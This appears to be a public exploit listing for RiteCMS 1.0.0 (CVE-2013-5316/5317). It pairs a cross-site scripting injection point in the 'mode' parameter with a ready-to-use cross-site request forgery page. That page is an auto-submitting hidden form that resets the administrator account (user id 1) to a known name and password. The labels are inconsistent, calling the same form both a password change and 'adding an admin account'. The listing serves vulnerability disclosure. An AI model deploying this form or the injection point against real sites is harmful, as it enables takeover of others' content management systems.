Rite CMS 1.0.0 Cross Site Request Forgery / Cross Site Scripting

2013-08-03 / 2013-08-21
Credit: Yashar shahinzadeh
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2013-5316 | CVE-2013-5317
CWE: CWE-79
CWE-352

########################################################################################### # Exploit Title: RiteCMS multiple vulnerabilities # Date: 2013 30 July # Exploit Author: Yashar shahinzadeh # Credit goes for: ha.cker.ir # Vendor Homepage: http://ritecms.com/ # Tested on: Linux & Windows, PHP 5.2.9 # Affected Version : 1.0.0 # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir } ########################################################################################### Summary: ======== 1. CSRF - Change administrator's password 2. Cross site scripting 1. CSRF - Adding an admin account: ================================== <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://[Path to RiteCMS]/cms/index.php" method="post"> <input type="hidden" name="mode" value="users"> <input type="hidden" name="id" value="1"> <input type="hidden" name="name" value="admin1"> <input type="hidden" name="new_pw" value="admin"> <input type="hidden" name="new_pw_r" value="admin"> <input type="hidden" name="type" value="1"> <input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> 2. Cross site scripting (After auth): ===================================== http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]

References:

http://ritecms.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top